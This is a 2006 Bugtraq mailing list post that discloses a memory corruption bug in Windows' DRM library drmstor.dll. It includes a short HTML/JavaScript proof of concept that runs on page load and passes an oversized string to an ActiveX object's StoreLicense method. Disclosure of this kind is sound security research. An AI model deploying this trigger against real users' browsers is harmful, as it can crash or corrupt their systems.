Home page logo
/

bugtraq logo Bugtraq mailing list archives

MS Windows DRM software Memory Corruption
From: Joxean Koret <joxeankoret () yahoo es>
Date: Mon, 9 Oct 2006 12:39:24 +0200 (CEST)

Hi to all,

While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll" library
which is a part of the DRM (Digital Rights Management)
software supplied with MS Windows.

The following Proof Of Concept is sufficient enough to
test the vulnerability:

<html>
<script>
function test()
{
var obj;
var x;

  x = "AAAA";

  for (i=0;i<=21;++i)
    x += x;

  obj = document.getElementById('testObj');
  obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id='testObj'
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact
-------

Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es




                
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y móviles desde 1 céntimo por minuto. 
http://es.voice.yahoo.com


  By Date           By Thread  

Current thread:
  • MS Windows DRM software Memory Corruption Joxean Koret (Oct 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]